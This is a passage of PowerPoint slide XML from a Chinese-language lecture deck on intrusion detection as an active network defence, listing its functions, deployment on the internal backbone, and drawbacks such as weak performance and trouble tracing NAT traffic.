            <p:nvPicPr>
              <p:cNvPr id="51" name="图片 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0FA0F67-2A33-5807-D596-C16BFDA8B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2" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F19E9C24-0F5E-5D41-84D6-214FC84D23BC}"/>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6" name="组合 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4244D8F-C7B8-D079-EF04-10D184928E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="955040" y="4719131"/>
            <a:ext cx="6630670" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10442" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C818C2-CB7A-748B-4BFC-2852CD613FB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="9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可以记录针对目标网络的攻击类型</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="68" name="组合 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{659855B3-6FAB-6174-D26B-23DB4A41F162}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="69" name="图片 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDF39515-8491-1A09-1247-06EC65D2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0" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54D2D86E-B043-C0DB-540A-43CCC2D6BA5B}"/>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D9C1A2AF-E70E-04C1-C51C-263D02B609DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6133858" y="4089157"/>
            <a:ext cx="5310505" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="8363" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C6900E5-E484-26C4-B3FC-2708A8B3C76D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="7418" cy="589"/>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性能不理想</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="81" name="组合 80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF54B071-77B0-8DD3-3CD7-E01AA6FCC9C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="86" name="图片 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A48C8C-8A03-9D80-1BB7-58A988233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1" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98097AFD-0CA0-15FB-4A66-4D8A0FF1F86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95" name="组合 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC470D3A-584F-DF04-1577-E8D417F9D7A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6136519" y="4677271"/>
            <a:ext cx="5452745" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="8587" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD46F9E9-64B6-6AD8-D21D-AA1CA145037D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="764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对进行</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>NAT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的访问来说不易定位源或目的地址</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="97" name="组合 96">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B971E056-AF31-D9F7-2286-C61F2E1C9B95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="98" name="图片 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F122FD3-0736-16C1-BCE0-6C295890C7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9" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2390BAA-1F6F-A943-ED97-75C5467B7B6D}"/>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53" name="组合 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{189F01A4-2FCA-B8E0-3EB6-27CF6884224E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6493904" y="3221846"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0853D03-35E3-C76C-8934-016D7CE6F9B6}"/>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5" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE53C67-D049-3EEC-D6DC-A3367515CB04}"/>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6" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EFAF329-ED3C-70FD-C4CF-B02B94FF84C3}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6DDF3C-655E-4319-9654-044D1FA055D9}"/>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393614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271905" y="2343785"/>
            <a:ext cx="4234815" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="6669" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="528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即时监控网络数据传输</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40" name="组合 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793750" y="1574800"/>
            <a:ext cx="561848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积极主动</a:t>
            </a:r>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的网络安全防护技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6229985" y="2242820"/>
            <a:ext cx="5058410" cy="3585845"/>
            <a:chOff x="1021" y="2052"/>
            <a:chExt cx="8174" cy="7574"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="图片 19"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1021" y="2052"/>
              <a:ext cx="8175" cy="7575"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:softEdge rad="63500"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="图片 20"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2651" y="3417"/>
              <a:ext cx="4658" cy="601"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:softEdge rad="76200"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1273175" y="2939415"/>
            <a:ext cx="3663950" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="5770" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="438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实时报告网络异常</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p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="组合 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1274445" y="3546475"/>
            <a:ext cx="4955540" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="7804" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="6421"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迅速、</a:t>
              </a:r>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主动地</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>采取反应措施</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44" name="组合 43"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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6"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p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2152650" y="4847590"/>
            <a:ext cx="283591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入侵检测技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B774E7FE-86D8-4302-B417-49A918BBD631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主动防护技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵检测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D7A6DB2C-88FB-3808-A74A-B08CD060E3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="4320000" cy="720000"/>
            <a:chOff x="3792538" y="3138472"/>
            <a:chExt cx="1213959" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698EB868-5B1B-E8BB-EB34-4A5483C7B4D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3792538" y="3138472"/>
              <a:ext cx="1213959"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3" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39EF1C4-9A3B-2A81-427E-0689AB2B3E0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4" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37684E28-920E-9778-4559-882227F6DF46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860800" y="3293024"/>
              <a:ext cx="1031865" cy="47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的部署</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内网主干</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2207808-5FF6-4273-3366-8A11B3D5DCC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1335040" y="2270855"/>
            <a:ext cx="916059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dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>最常用的部署位置，主要检测内网流出和经过防火墙过滤后流入内网的网络数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="1200" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03300A43-5B4B-7EDB-E412-BD8491048FFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1141451" y="3236042"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8C3F9F-D15D-B3FF-7497-B56DF20E5252}"/>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5" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4336BCAD-DB9B-7A0A-6353-69779EA9DA31}"/>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6" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCE99AE-0EE9-6C81-801A-82A5AAC490E7}"/>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47" name="组合 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCD80AA-6A81-BDD0-C942-3AF530FCC56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="955040" y="4082781"/>
            <a:ext cx="6880225" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10835" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722D8E04-0C2D-B185-37DF-A1CC4A1C3C5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="989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sz="1800" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>提高了检测攻击的识别可能</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356D418F-25B3-529A-BC97-55E46D276738}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="51" name="图片 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0FA0F67-2A33-5807-D596-C16BFDA8B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2" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F19E9C24-0F5E-5D41-84D6-214FC84D23BC}"/>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6" name="组合 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4244D8F-C7B8-D079-EF04-10D184928E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="955040" y="4719131"/>
            <a:ext cx="6630670" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10442" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C818C2-CB7A-748B-4BFC-2852CD613FB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="9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sz="1800" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>检测内网可信用户的越权行为</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="68" name="组合 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{659855B3-6FAB-6174-D26B-23DB4A41F162}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
